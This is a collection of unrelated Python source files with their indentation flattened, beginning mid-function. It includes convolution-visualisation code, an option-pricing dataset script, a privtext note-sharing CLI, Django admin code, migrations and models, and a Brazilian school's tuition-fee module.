n, c, h, w = arg.shape
if h < min_h:
min_h = h
if w < min_w:
min_w = w
crop_args = []
for a in args:
crop_args.append(mid_crop(a, min_h, min_w))
return crop_args
def imshow(arr):
plt.imshow(arr)
plt.show()
def arrshow(arr, ax=None, cmap=None):
# nchw -> hwc
i = arr[0].transpose(1, 2, 0)
if cmap is None:
cmap_n = "viridis"
else:
cmap_n = cmap
if i.shape[-1] == 1:
i = i[:, :, 0]
if cmap is None:
cmap_n = "gray"
else:
cmap_n = cmap
if ax is None:
plt.imshow(i, cmap=cmap_n)
plt.show()
else:
ax.imshow(i, cmap=cmap_n)
def make_conv_params(input_dim, output_dim, kernel):
#w_o = np.ones((output_dim, input_dim, kernel, kernel), dtype="float32")
#b_o = np.ones((output_dim,), dtype="float32")
random_state = np.random.RandomState(0)
w_o = .01 * random_state.randn(output_dim, input_dim, kernel, kernel).astype("float32")
b_o = np.zeros((output_dim,), dtype="float32")
return w_o, b_o
# Modified from Felix Lau, MIT License
def np_map_coordinates(inp, coords, order=1):
assert order == 1
coords_lt = np.cast["int32"](np.floor(coords))
coords_rb = np.cast["int32"](np.ceil(coords))
coords_lb = np.asarray((coords_lt[:, 0], coords_rb[:, 1])).transpose(1, 0)
coords_rt = np.asarray((coords_rb[:, 0], coords_lt[:, 1])).transpose(1, 0)
def fancy_take(a1, ind):
flat_ind = a1.shape[1] * ind[:, 0] + ind[:, 1]
return np.take(inp, flat_ind).copy()
vals_lt = fancy_take(inp, coords_lt)
vals_rb = fancy_take(inp, coords_rb)
vals_lb = fancy_take(inp, coords_lb)
vals_rt = fancy_take(inp, coords_rt)
coords_offset_lt = coords - np.cast["float32"](coords_lt)
vals_t = vals_lt + (vals_rt - vals_lt) * coords_offset_lt[:, 0]
vals_b = vals_lb + (vals_rb - vals_lb) * coords_offset_lt[:, 0]
mapped_vals = vals_t + (vals_b - vals_t) * coords_offset_lt[:, 1]
return mapped_vals
def np_batch_map_coordinates(inp, coords, order=1):
assert order == 1
coords = coords.clip(0, inp.shape[1] - 1)
mapped_vals = np.array([np_map_coordinates(inp, coord)
for inp, coord in zip(inp, coords)])
return mapped_vals
def np_batch_map_offsets(inp, offsets):
batch_size = inp.shape[0]
input_size = inp.shape[1]
offsets = offsets.reshape(batch_size, -1, 2)
grid = np.stack(np.mgrid[:input_size, :input_size], -1).reshape(-1, 2)
grid = np.repeat([grid], batch_size, axis=0)
coords = offsets + grid
coords = coords.clip(0, input_size - 1)
mapped_vals = np_batch_map_coordinates(inp, coords)
mapped_vals = mapped_vals.reshape(batch_size, input_size, input_size)
return mapped_vals
def sp_map_coordinates(inp, coords, order=1):
return sp.ndimage.interpolation.map_coordinates(inp, coords.T,
mode="nearest", order=order)
def sp_batch_map_coordinates(inp, coords, order=1):
assert order == 1
coords = coords.clip(0, inp.shape[1] - 1)
mapped_vals = np.array([sp_map_coordinates(inp, coord)
for inp, coord in zip(inp, coords)])
return mapped_vals
def sp_batch_map_offsets(inp, offsets):
batch_size = inp.shape[0]
input_size = inp.shape[1]
offsets = offsets.reshape(batch_size, -1, 2)
grid = np.stack(np.mgrid[:input_size, :input_size], -1).reshape(-1, 2)
grid = np.repeat([grid], batch_size, axis=0)
coords = offsets + grid
coords = coords.clip(0, input_size - 1)
mapped_vals = sp_batch_map_coordinates(inp, coords)
mapped_vals = mapped_vals.reshape(batch_size, input_size, input_size)
return mapped_vals
fname = "napoleon_sloth.png"
# rgba image
img_arr = imread(fname)
# rgb image
img_arr = img_arr[:200, :200, :3]
# gray image
img_arr = np.dot(img_arr, np.array([.2126, 0.7152, 0.0722]))
"""
plt.imshow(img_arr, cmap="gray")
plt.savefig("tmp.png")
"""
"""
inp = np.random.random((100, 100))
coords = np.random.random((200, 2)) * 99
r1 = sp_map_coordinates(inp, coords)
r2 = np_map_coordinates(inp, coords)
assert np.abs(r2 - r1).max() < 1E-6
inp = np.random.random((4, 100, 100))
coords = np.random.random((4, 200, 2)) * 99
rr1 = sp_batch_map_coordinates(inp, coords)
rr2 = np_batch_map_coordinates(inp, coords)
assert np.abs(rr2 - rr1).max() < 1E-6
inp = np.random.random((4, 100, 100))
offsets = np.random.random((4, 100, 100, 2)) * 2
rrr1 = sp_batch_map_offsets(inp, offsets)
rrr2 = np_batch_map_offsets(inp, offsets)
assert np.abs(rrr2 - rrr1).max() < 1E-6
"""
mb = img_arr[None, :, :, None]
# transpose to NCHW
mb = mb.transpose(0, 3, 1, 2)
minibatch_size = 1
in_dim = 1
n_filt = 32
kernel = 3
# conv parameters
np_w, np_b = make_conv_params(in_dim, n_filt, kernel)
a1_o = conv2(mb, np_w, np_b, pad="same")
# offset conv parameters
np_o_w2, _ = make_conv_params(n_filt, 2 * n_filt, kernel)
np_w2, np_b2 = make_conv_params(n_filt, n_filt, kernel)
a2_offset, a2_offset_p = conv_offset2(a1_o, np_o_w2, pad="same")
a2_o = conv2(a2_offset, np_w2, np_b2, pad="same")
# offset conv parameters
np_o_w3, _ = make_conv_params(n_filt, 2 * n_filt, kernel)
np_w3, np_b3 = make_conv_params(n_filt, n_filt, kernel)
a3_offset, a3_offset_p = conv_offset2(a2_o, np_o_w3, pad="same")
a3_o = conv2(a3_offset, np_w3, np_b3, pad="same")
# offset conv parameters
np_o_w4, _ = make_conv_params(n_filt, 2 * n_filt, kernel)
np_w4, np_b4 = make_conv_params(n_filt, n_filt, kernel)
# mb or a3_o?
a4_offset, a4_offset_p = conv_offset2(a3_o, np_o_w4, pad="same")
a4_o = conv2(a4_offset, np_w4, np_b4, pad="same")
"""
a1 = a1_o #conv2(mb, np_w, np_b, stride=1, dilation=1, pad="same")
a3 = conv2(a2_offset, np_w2, np_b2, stride=1, dilation=4, pad="same")
a5 = conv2(a3_offset, np_w3, np_b3, stride=1, dilation=8, pad="same")
a7 = conv2(a4_offset, np_w4, np_b4, stride=1, dilation=16, pad="same")
"""
"""
a1 = conv2(mb, np_w, np_b, stride=1, dilation=1, pad="same")
a3 = conv2(mb, np_w, np_b, stride=1, dilation=4, pad="same")
a5 = conv2(mb, np_w, np_b, stride=1, dilation=8, pad="same")
a7 = conv2(mb, np_w, np_b, stride=1, dilation=16, pad="same")
"""
a1 = a1_o
a3 = a2_o
a5 = a3_o
a7 = a4_o
a1, a3, a5, a7 = crop_match(a1, a3, a5, a7)
def stack(*args):
return np.concatenate([a[..., None] for a in args], axis=-1)
def apply_weights(stacked_arr, hw, ww, sw):
# stacked_arr is 5D
# n_samples, n_channels, height, width, scales
# hw height weights
# ww width weights
# sw scale weights
a_w = ww[None] * hw[:, None]
hww = a_w
a_w = a_w[:, :, None] * sw[None, None]
a_w = a_w[None, None]
o = (a_w * stacked_arr).sum(axis=-1)
return o, hww, a_w
r3 = stack(a1, a3, a5, a7)
#r3 = stack(a1, a3, a5)
random_state = np.random.RandomState(1999)
def h_x(size):
hw = np.linspace(0, 1, size) - 0.5
hw = -hw ** 2 + 0.5
return hw
def w_x(size):
ww = np.linspace(0, 1, size) - 0.5
ww = -ww ** 2 + 0.5
return ww
def s_x(size):
sw = random_state.rand(size)
return sw
hw = h_x(r3.shape[2])
ww = w_x(r3.shape[3])
sw = s_x(r3.shape[4])
r, hww, w = apply_weights(r3, hw, ww, sw)
def megaplot(im, final_im, stack, hw, ww, sw, kernel_offset):
f = plt.figure()
n_scales = stack.shape[-1]
if n_scales < 3:
raise ValueError("Cannot plot < 3 scales")
n_y = n_scales + 3
n_x = n_scales + 1
gs1 = gridspec.GridSpec(n_y, n_x)
a = []
for i in range(n_scales + 1):
a.append(plt.subplot(gs1[0, i]))
ax2 = plt.subplot(gs1[1, 1:])
ax3_2 = plt.subplot(gs1[2:n_x - 1, 1:])
#ax3_1 = plt.subplot(gs1[2:n_x - 1, 0], sharey=ax3_2)
ax3_1 = plt.subplot(gs1[2:n_x - 1, 0])
ax4_1 = plt.subplot(gs1[n_x - 1, 0])
#ax4_2 = plt.subplot(gs1[n_x - 1, 1:], sharex=ax3_2)
ax4_2 = plt.subplot(gs1[n_x - 1, 1:])
arrshow(im, a[0], cmap="gray")
for i in range(1, n_scales + 1):
sim = stack[0, kernel_offset:kernel_offset+1, :, :, i - 1][0]
a[i].imshow(sim, cmap="gray")
ax2.plot(sw)
ax3_1.plot(hw, np.arange(len(hw)))
ax3_1.invert_yaxis()
ax4_1.imshow(hww, cmap="gray")
ax4_2.plot(ww)
arrshow(final_im[:, kernel_offset:kernel_offset+1], ax3_2)
plt.show()
for j in range(n_filt):
megaplot(mb, r, r3, hw, ww, sw, j)
plt.savefig("tmp{}.png".format(j))
plt.show()
|
import pandas as pd
from numpy.random import default_rng
from monte_carlo.dataset_maker import _get_price
from settings import OPTIONS_PARAMS_RANDOM_SEED
from utils.typing import OptionAvgType
VARIABLE_PARAMS_NUMBER = 4
ENTRIES_NUMBER = 10000
def create_fixed_datasets():
rng = default_rng(OPTIONS_PARAMS_RANDOM_SEED)
for i in range(VARIABLE_PARAMS_NUMBER):
print(i)
data = {
'spot_strike_ratio': (0.5 + rng.random(ENTRIES_NUMBER)) if i == 0 else 1,
'ttm': (0.5 + rng.random(ENTRIES_NUMBER)) if i == 1 else 1,
'risk_free_rate': (rng.random(ENTRIES_NUMBER) * 0.2) if i == 2 else 0.1,
'volatility': (0.05 + rng.random(ENTRIES_NUMBER) * 0.5) if i == 3 else 0.2,
'avg_type': OptionAvgType.ARITHMETIC.value,
}
df = pd.DataFrame(data=data)
price_and_ci_df = df.apply(_get_price, axis=1, result_type='expand')
price_and_ci_df.columns = ['price_strike_ratio', 'left_ci', 'right_ci']
df = pd.concat([df, price_and_ci_df], axis=1)
idx_to_param = {
0: 'spot',
1: 'ttm',
2: 'rate',
3: 'vol'
}
df.to_csv(f'../fixed_{idx_to_param[i]}_dataset.csv', index=False, float_format='%.4f')
if __name__ == '__main__':
create_fixed_datasets()
|
#-*- coding: utf-8 -*-
import sys, os
from privtext.env import _TEST_MODE
from privtext.args import get_args
from privtext.utils import cross_input
from privtext import PrivateText
import re
def run(args=None):
if args is None:
args = sys.argv[1:]
args = get_args(args=args)
if os.isatty(sys.stdout.fileno()):
private = PrivateText(keysize=args.keysize, password=args.password, timelive=args.lifetime, email=args.email, debug_mode=_TEST_MODE)
private.set('split_lines', args.split_lines)
l = len(args.text)
r = re.compile('^https://privtext\\.com/([^/#]+)(#(.+))?$', flags=re.I)
m = r.search(args.text)
if not m is None:
noteid = m.group(1)
password = m.group(3)
if password is None or len(password) == 0:
password = private.get('password')
if not password:
print('You must add password for note `%s` to link (#password) or with flag -p --password. For more info call --help, please.' % noteid)
sys.exit(-1)
private.set('password', password)
private.set('noteid', noteid)
else:
if l > 0:
private.set('text', args.text)
elif not args.file is None:
private.set('inputfile', args.file)
if not args.outfile is None:
private.set('outfile', args.outfile)
if not m is None:
private.read()
else:
private.send()
private.printout()
# print("Please, press [Enter] for exit...")
# cross_input()
else:
print('Only for console/terminal')
if __name__ == '__main__':
run()
|
import locale
import icu
from django.contrib import admin
from django.contrib.auth import get_user_model
from django.http import Http404
from django.template.response import TemplateResponse
from django.utils.translation import ugettext_lazy as _
from . import ( # NOQA
account,
agegroup,
agreements,
citizenship,
courses,
department,
donation,
events,
journals,
leprikonsite,
messages,
orderables,
organizations,
place,
printsetup,
question,
refundrequest,
registrationlink,
roles,
school,
schoolyear,
subjects,
targetgroup,
timesheets,
transaction,
user,
)
User = get_user_model()
admin.site.site_header = _("Leprikon administration")
admin.site.site_title = _("Leprikon administration")
def app_index(self, request, app_label, extra_context=None):
app_dict = self._build_app_dict(request, app_label)
if not app_dict:
raise Http404("The requested admin page does not exist.")
# Sort the models alphabetically within each app.
collator = icu.Collator.createInstance(icu.Locale(".".join(locale.getlocale())))
app_dict["models"].sort(key=lambda x: collator.getSortKey(x["name"].lower()))
context = dict(
self.each_context(request),
title=_("Leprikon administration"),
app_list=[app_dict],
app_label=app_label,
)
context.update(extra_context or {})
request.current_app = self.name
return TemplateResponse(
request, self.app_index_template or ["admin/%s/app_index.html" % app_label, "admin/app_index.html"], context
)
def get_app_list(self, request):
"""
Returns a sorted list of all the installed apps that have been
registered in this site.
"""
collator = icu.Collator.createInstance(icu.Locale(".".join(locale.getlocale())))
app_dict = self._build_app_dict(request)
# Sort the apps alphabetically.
app_list = sorted(app_dict.values(), key=lambda x: collator.getSortKey(x["name"].lower()))
# Sort the models alphabetically within each app.
for app in app_list:
app["models"].sort(key=lambda x: collator.getSortKey(x["name"].lower()))
return app_list
# override default Admin site's app_index and get_app_list
admin.sites.AdminSite.app_index = app_index
admin.sites.AdminSite.get_app_list = get_app_list
|
__version__ = '3.7.13'
|
# setup.py
from setuptools import find_packages, setup
setup(
name="rl_toolkit",
version="0.0.0",
packages=find_packages(exclude=["docs", "scripts", "tests"]),
install_requires=[
"gym",
"gym_fishing",
"gym_conservation",
"numpy",
"pandas",
"matplotlib",
"stable_baselines3",
],
extras_require={
"tests": [
# Run tests and coverage
"pytest",
"pytest-cov",
"pytest-env",
"pytest-xdist",
# Type check
"pytype",
# Lint code
"flake8>=3.8",
# Sort imports
"isort>=5.0",
# Reformat
"black",
],
"docs": [
"sphinx",
"sphinx-autobuild",
"sphinx-rtd-theme",
# For spelling
"sphinxcontrib.spelling",
# Type hints support
"sphinx-autodoc-typehints",
],
},
)
|
# Generated by Django 2.1.4 on 2019-09-20 21:40
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('river', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='transitionapproval',
name='destination_state',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='transition_approvals_as_destination', to='river.State', verbose_name='Next State'),
),
migrations.AlterField(
model_name='transitionapproval',
name='meta',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='transition_approvals', to='river.TransitionApprovalMeta', verbose_name='Meta'),
),
migrations.AlterField(
model_name='transitionapproval',
name='source_state',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='transition_approvals_as_source', to='river.State', verbose_name='Source State'),
),
migrations.AlterField(
model_name='transitionapproval',
name='transactioner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='Transactioner'),
),
migrations.AlterField(
model_name='transitionapproval',
name='workflow',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='transition_approvals', to='river.Workflow', verbose_name='Workflow'),
),
]
|
import datetime
from typing import Text
from uuid import uuid4
import bigfastapi.db.database as db
import sqlalchemy.orm as orm
from sqlalchemy.schema import Column
from sqlalchemy.types import String, DateTime, Integer
class qrcode(db.Base):
__tablename__ = "qrcode"
id = Column(String(255), primary_key=True, index=True, default=uuid4().hex)
question = Column(String(255), index=True)
answer = Column(String(700), index=True)
created_by = Column(String(255), index=True)
date_created = Column(DateTime, default=datetime.datetime.utcnow)
|
from __future__ import annotations
from enum import Enum
from datetime import datetime
from jsonclasses import jsonclass, types
from jsonclasses_pymongo import pymongo
@pymongo
@jsonclass(class_graph='simple')
class SimpleCalcUser:
id: str = types.readonly.str.primary.mongoid.required
name: str
first_name: str = types.str.getter(lambda u: u.name.split(" ")[0])
last_name: str = types.str.getter(types.this.fval('name').split(' ').at(1))
base_score: float
score: float = types.float.getter(types.this.fval('base_score').mul(2)).negative
created_at: datetime = types.readonly.datetime.tscreated.required
updated_at: datetime = types.readonly.datetime.tsupdated.required
|
from django.db import models
from django.db.models.signals import post_save
from django.db.models import Sum
from django.dispatch.dispatcher import receiver
from django.shortcuts import render
from datetime import date
from collections import OrderedDict
from alunos.models import Matricula
class Mensalidade(models.Model):
SITUACAO_PENDENTE = 1
SITUACAO_CANCELADA = 2
SITUACAO_PAGA = 3
MES_REFERENCIA_CHOICES = (
(1, 'Janeiro'),
(2, 'Fevereiro'),
(3, 'Março'),
(4, 'Abril'),
(5, 'Maio'),
(6, 'Junho'),
(7, 'Julho'),
(8, 'Agosto'),
(9, 'Setembro'),
(10, 'Outubro'),
(11, 'Novembro'),
(12, 'Dezembro'),
)
SITUACAO_CHOICES = (
(SITUACAO_PENDENTE, 'Pendente'),
(SITUACAO_CANCELADA, 'Cancelada'),
(SITUACAO_PAGA, 'Paga'),
)
matricula = models.ForeignKey(Matricula)
mes_referencia = models.PositiveSmallIntegerField(choices=MES_REFERENCIA_CHOICES)
ano_referencia = models.PositiveIntegerField()
situacao = models.PositiveSmallIntegerField(choices=SITUACAO_CHOICES, default=1)
data_pagamento = models.DateField(null=True)
valor_cobrado = models.DecimalField(max_digits=6, decimal_places=2, \
default=0, verbose_name='Valor cobrado')
valor_pago = models.DecimalField(max_digits=6, decimal_places=2, \
default=0, verbose_name='Valor pago')
class Meta:
verbose_name='Mensalidade'
verbose_name_plural='Mensalidades'
def __str__(self):
return '%s - %s/%s - %s' % (self.matricula.aluno.nome, self.mes_referencia, \
self.ano_referencia, self.situacao)
def get_str_mes_ano(self):
return '%s/%s' % (self.mes_referencia, self.ano_referencia)
def get_data_limite_para_pagamento_em_dia(self):
return date(self.ano_referencia, self.mes_referencia, \
self.matricula.dia_de_vencimento)
def get_pago_em_dia(self):
return self.data_pagamento <= self.get_data_limite_para_pagamento_em_dia()
@receiver(post_save, sender=Matricula)
def matriculas_post_save(sender, instance, **kwargs):
nova_matricula = instance
# define o mês atual
hoje = date.today()
mes_atual = hoje.month
ano_atual = hoje.year
# cria variável de retorno
novas_mensalidades = list()
# para a matrícula passada como parâmetro:
# mes_busca = nova_matricula.mes_de_matricula
# repete:
# busca mensalidade para o mes_busca + nova_matricula
# existe?
# sim: não faz nada
# não: cria nova mensalidade para o mes_busca + nova_matricula
# com situação 'em aberto'
# enquanto mes_busca < mes_atual
mes_busca = nova_matricula.data_matricula.month
ano_busca = nova_matricula.data_matricula.year
while ano_busca <= ano_atual:
if ano_busca == ano_atual:
#print(' anos iguais (busca e atual) %s - %s' % (ano_busca, ano_atual))
while mes_busca <= mes_atual:
if not (Mensalidade.objects.filter( matricula=nova_matricula, \
mes_referencia=mes_busca, \
ano_referencia=ano_busca).exists()):
#print('GERA MENSALIDADE mes/ano %s/%s' % (mes_busca, ano_busca))
novas_mensalidades.append(gerar_mensalidade(nova_matricula, mes_busca, ano_busca))
mes_busca+=1
else:
#print(' anos dif. (busca e atual) %s - %s' % (ano_busca, ano_atual))
while mes_busca <= 12:
if not (Mensalidade.objects.filter( matricula=nova_matricula, \
mes_referencia=mes_busca, \
ano_referencia=ano_busca).exists()):
#print('GERA MENSALIDADE mes/ano %s/%s' % (mes_busca, ano_busca))
novas_mensalidades.append(gerar_mensalidade(nova_matricula, mes_busca, ano_busca))
mes_busca+=1
else:
mes_busca = 1
ano_busca+=1
#print('\n')
return novas_mensalidades
def gerar_mensalidade(matricula, mes_referencia, ano_referencia):
mensalidade = Mensalidade()
mensalidade.matricula = matricula
mensalidade.mes_referencia = mes_referencia
mensalidade.ano_referencia = ano_referencia
mensalidade.valor_cobrado = matricula.valor_da_mensalidade
mensalidade.save()
return mensalidade
def calcular_mensalidades(request):
# define o mês atual
hoje = date.today()
mes_atual = hoje.month
ano_atual = hoje.year
# cria variáveis que serão renderizadas no template
mensagem_retorno = ''
novas_mensalidades = list()
quantidade_mensalidades_ja_existentes = 0
# busca todas as matrículas ativas
matriculas_ativas = Matricula.objects.filter(situacao_matricula=1) # 1 = ativas
if matriculas_ativas:
mensagem_retorno = 'Gerando mensalidades para matrículas ativas'
for matricula_ativa in matriculas_ativas:
# para cada matrícula ativa:
# mes_busca = matricula_ativa.mes_de_matricula
# repete:
# busca mensalidade para o mes_busca + matricula_ativa
# existe?
# sim: não faz nada
# não: cria nova mensalidade para o mes_busca + matricula_ativa
# com situação 'em aberto'
# enquanto mes_busca < mes_atual
mes_busca = matricula_ativa.data_matricula.month
ano_busca = matricula_ativa.data_matricula.year
#print('Matrícula ativa: \n')
#print(matricula_ativa)
while ano_busca <= ano_atual:
if ano_busca == ano_atual:
#print(' anos iguais (busca e atual) %s - %s' % (ano_busca, ano_atual))
while mes_busca <= mes_atual:
if not (Mensalidade.objects.filter( matricula=matricula_ativa, \
mes_referencia=mes_busca, \
ano_referencia=ano_busca).exists()):
#print('GERA MENSALIDADE mes/ano %s/%s' % (mes_busca, ano_busca))
novas_mensalidades.append(gerar_mensalidade(matricula_ativa, mes_busca, ano_busca))
else:
#print('Mensalidade mes/ano %s/%s já existe!' % (mes_busca, ano_busca))
quantidade_mensalidades_ja_existentes+=1
mes_busca+=1
else:
#print(' anos dif. (busca e atual) %s - %s' % (ano_busca, ano_atual))
while mes_busca <= 12:
if not (Mensalidade.objects.filter( matricula=matricula_ativa, \
mes_referencia=mes_busca, \
ano_referencia=ano_busca).exists()):
#print('GERA MENSALIDADE mes/ano %s/%s' % (mes_busca, ano_busca))
novas_mensalidades.append(gerar_mensalidade(matricula_ativa, mes_busca, ano_busca))
else:
#print('Mensalidade mes/ano %s/%s já existe!' % (mes_busca, ano_busca))
quantidade_mensalidades_ja_existentes+=1
mes_busca+=1
else:
mes_busca = 1
ano_busca+=1
#print('\n')
else:
mensagem_retorno = 'Não encontrada nenhuma matrícula ativa no sistema!'
context = {'mensagem_retorno': mensagem_retorno, 'novas_mensalidades': novas_mensalidades, \
'quantidade_mensalidades_ja_existentes': quantidade_mensalidades_ja_existentes, }
return render(request,"calcular_mensalidades.html",context)
def buscar_mensalidades_em_atraso(request):
# define o mês atual e ano atual
hoje = date.today()
mes_atual = hoje.month
ano_atual = hoje.year
dia_atual = hoje.day
mensalidades_temp = list()
mensalidades_em_atraso = list()
# faz a consulta
mensalidades_temp = Mensalidade.objects.filter(situacao=Mensalidade.SITUACAO_PENDENTE) \
.order_by('matricula__aluno__nome', '-ano_referencia','-mes_referencia')
for mensalidade in mensalidades_temp:
if mensalidade.get_data_limite_para_pagamento_em_dia() < hoje:
mensalidades_em_atraso.append(mensalidade)
# totaliza o valor em atraso por aluno
matricula_da_vez = None
total_em_atraso_da_vez = 0
total_em_atraso_geral = 0
total_em_atraso_por_aluno = dict()
for mensalidade in mensalidades_em_atraso:
if mensalidade.matricula != matricula_da_vez:
if matricula_da_vez != None:
total_em_atraso_por_aluno[matricula_da_vez.aluno.nome] = total_em_atraso_da_vez
matricula_da_vez = mensalidade.matricula
total_em_atraso_da_vez = 0
total_em_atraso_da_vez += mensalidade.valor_cobrado
total_em_atraso_geral += mensalidade.valor_cobrado
# total do último aluno
total_em_atraso_por_aluno[matricula_da_vez.aluno.nome] = total_em_atraso_da_vez
total_em_atraso_por_aluno = OrderedDict(sorted(total_em_atraso_por_aluno.items(), \
key=lambda t: t[0], reverse=False))
# totaliza o valor em atraso por mes/ano
total_em_atraso_por_mes_ano = dict()
for mensalidade in mensalidades_em_atraso:
str_mes_referencia = str(mensalidade.mes_referencia)
if len(str_mes_referencia) == 1:
str_mes_referencia = '0'+str_mes_referencia
str_ano_referencia = str(mensalidade.ano_referencia)
chave = str_ano_referencia+'_'+str_mes_referencia
if chave not in total_em_atraso_por_mes_ano:
total_em_atraso_por_mes_ano[chave] = 0
total_em_atraso_por_mes_ano[chave] += mensalidade.valor_cobrado
total_em_atraso_por_mes_ano = OrderedDict(sorted(total_em_atraso_por_mes_ano.items(), \
key=lambda t: t[0], reverse=True))
mensagem_retorno = ''
mensagem_retorno_2 = ''
if mensalidades_em_atraso:
mensagem_retorno = 'Existem '+str(len(mensalidades_em_atraso))+' mensalidades em atraso!'
mensagem_retorno_2 = '(mensalidades c/ vcto anterior ao dia %s)' % (dia_atual)
else:
mensagem_retorno = 'Não encontrada nenhuma mensalidade em atraso!'
context = {'mensagem_retorno': mensagem_retorno, 'mensagem_retorno_2': mensagem_retorno_2,\
'mensalidades_em_atraso': mensalidades_em_atraso, 'total_em_atraso_por_aluno': \
total_em_atraso_por_aluno, 'total_em_atraso_geral': total_em_atraso_geral, \
'total_em_atraso_por_mes_ano': total_em_atraso_por_mes_ano, }
return render(request,"mensalidades_em_atraso.html",context)
def buscar_mensalidades_recebidas(request):
# define o número de meses retroativos que se deve buscar mensalidades recebidas
NUMERO_MESES_AVALIADOS = 6
# define o mês atual e ano atual
hoje = date.today()
mes_atual = hoje.month
ano_atual = hoje.year
data_analise_inicial = None # deve ser o primeiro dia do (mês passado - Nº MESES ANÁLISE)
data_analise_final = None # deve ser o último dia do mês passado
#mes_analise_final = mes_atual - 1
mes_analise_final = mes_atual
ano_analise_final = ano_atual
if mes_analise_final == 0:
mes_analise_final = 12
ano_analise_final -= 1
mes_analise_inicial = mes_analise_final - NUMERO_MESES_AVALIADOS
ano_analise_inicial = ano_analise_final
if mes_analise_inicial <= 0:
mes_analise_inicial = mes_analise_inicial + 12
ano_analise_inicial -= 1
data_analise_inicial = date(ano_analise_inicial,mes_analise_inicial,1)
dia_analise_final = 31
if mes_analise_final == 2:
dia_analise_final = 28
elif mes_analise_final in (4,6,9,11):
dia_analise_final = 30
data_analise_final = date(ano_analise_final,mes_analise_final,dia_analise_final)
mensalidades_recebidas_ultimos_meses = list()
mensalidades_recebidas_neste_mes = list()
mensalidades_a_receber_neste_mes = list()
numero_de_mensalidades_recebidas_ultimos_meses = 0
numero_de_mensalidades_recebidas_neste_mes = 0
numero_de_mensalidades_a_receber_neste_mes = 0
# faz as consultas
mensalidades_recebidas_neste_mes = Mensalidade.objects.filter(situacao=Mensalidade.SITUACAO_PAGA, \
data_pagamento__gte=(date(ano_atual,mes_atual,1))).order_by('-ano_referencia','-mes_referencia')
mensalidades_a_receber_neste_mes = Mensalidade.objects.filter(situacao=Mensalidade.SITUACAO_PENDENTE, \
ano_referencia=ano_atual,mes_referencia=mes_atual).order_by('-ano_referencia','-mes_referencia')
mensalidades_recebidas_ultimos_meses = Mensalidade.objects.filter(situacao=Mensalidade.SITUACAO_PAGA, \
data_pagamento__range=([data_analise_inicial, data_analise_final])).order_by('-ano_referencia','-mes_referencia')
mensagem_retorno = ''
mensagem_retorno_2 = ''
total_recebido_neste_mes = 0
total_a_receber_neste_mes = 0
total_recebido_por_mes_ano = list()
if mensalidades_a_receber_neste_mes:
numero_de_mensalidades_a_receber_neste_mes = len(mensalidades_a_receber_neste_mes)
for mensalidade in mensalidades_a_receber_neste_mes:
total_a_receber_neste_mes += mensalidade.valor_cobrado
if mensalidades_recebidas_neste_mes:
numero_de_mensalidades_recebidas_neste_mes = len(mensalidades_recebidas_neste_mes)
for mensalidade in mensalidades_recebidas_neste_mes:
total_recebido_neste_mes += mensalidade.valor_pago
if mensalidades_recebidas_ultimos_meses:
numero_de_mensalidades_recebidas_ultimos_meses = len(mensalidades_recebidas_ultimos_meses)
primeira_mensalidade = mensalidades_recebidas_ultimos_meses[0]
str_mes_para_comparacao = str(primeira_mensalidade.mes_referencia)
str_ano_para_comparacao = str(primeira_mensalidade.ano_referencia)
if len(str_mes_para_comparacao) == 1:
str_mes_para_comparacao = '0'+str_mes_para_comparacao
valor_do_mes_da_vez = 0
valor_de_meses_anteriores_da_vez = 0
total_mes = 0
total_meses_anteriores = 0
for mensalidade in mensalidades_recebidas_ultimos_meses:
str_mes_da_vez = str(mensalidade.mes_referencia)
str_ano_da_vez = str(mensalidade.ano_referencia)
if len(str_mes_da_vez) == 1:
str_mes_da_vez = '0'+str_mes_da_vez
if str_mes_da_vez != str_mes_para_comparacao:
chave = str_ano_para_comparacao+'_'+str_mes_para_comparacao
total_recebido_por_mes_ano.append({'ano_mes': chave,\
'valor_do_mes': valor_do_mes_da_vez, \
'valor_de_meses_anteriores': valor_de_meses_anteriores_da_vez ,\
'valor_total_do_mes': (valor_do_mes_da_vez+valor_de_meses_anteriores_da_vez)})
valor_do_mes_da_vez = 0
valor_de_meses_anteriores_da_vez = 0
str_mes_para_comparacao = str_mes_da_vez
if mensalidade.get_pago_em_dia():
valor_do_mes_da_vez += mensalidade.valor_pago
total_mes += mensalidade.valor_pago
else:
valor_de_meses_anteriores_da_vez += mensalidade.valor_pago
total_meses_anteriores += mensalidade.valor_pago
# acumula valores da última mensalidade
chave = str_ano_para_comparacao+'_'+str_mes_para_comparacao
total_recebido_por_mes_ano.append({'ano_mes': chave,\
'valor_do_mes': valor_do_mes_da_vez, \
'valor_de_meses_anteriores': valor_de_meses_anteriores_da_vez ,\
'valor_total_do_mes': (valor_do_mes_da_vez+valor_de_meses_anteriores_da_vez)})
# gera um totalizador
chave = 'Total'
total_recebido_por_mes_ano.append({'ano_mes': chave,\
'valor_do_mes': total_mes, \
'valor_de_meses_anteriores': total_meses_anteriores ,\
'valor_total_do_mes': (total_mes+total_meses_anteriores)})
if mensalidades_recebidas_ultimos_meses:
mensagem_retorno = str(len(mensalidades_recebidas_ultimos_meses))+ \
' mensalidades recebidas'
mensagem_retorno_2 = '(nos últimos '+str(NUMERO_MESES_AVALIADOS)+' meses, incluindo mês atual)'
else:
mensagem_retorno = 'Não encontrada nenhuma mensalidade recebida nos últimos '+ \
str(NUMERO_MESES_AVALIADOS)+' meses!'
context = {'mensagem_retorno': mensagem_retorno, 'mensagem_retorno_2': mensagem_retorno_2, \
'total_recebido_por_mes_ano': total_recebido_por_mes_ano, 'total_a_receber_neste_mes': \
total_a_receber_neste_mes, 'total_recebido_neste_mes': total_recebido_neste_mes, \
'numero_de_mensalidades_recebidas_ultimos_meses': numero_de_mensalidades_recebidas_ultimos_meses,
'numero_de_mensalidades_recebidas_neste_mes': numero_de_mensalidades_recebidas_neste_mes,
'numero_de_mensalidades_a_receber_neste_mes': numero_de_mensalidades_a_receber_neste_mes, }
return render(request,"mensalidades_recebidas.html",context)
|
# -*- coding: utf-8 -*-
import os
from setuptools import find_packages
from setuptools import setup
with open(os.path.join(os.path.abspath(os.path.dirname(__file__)), "README.md")) as fp:
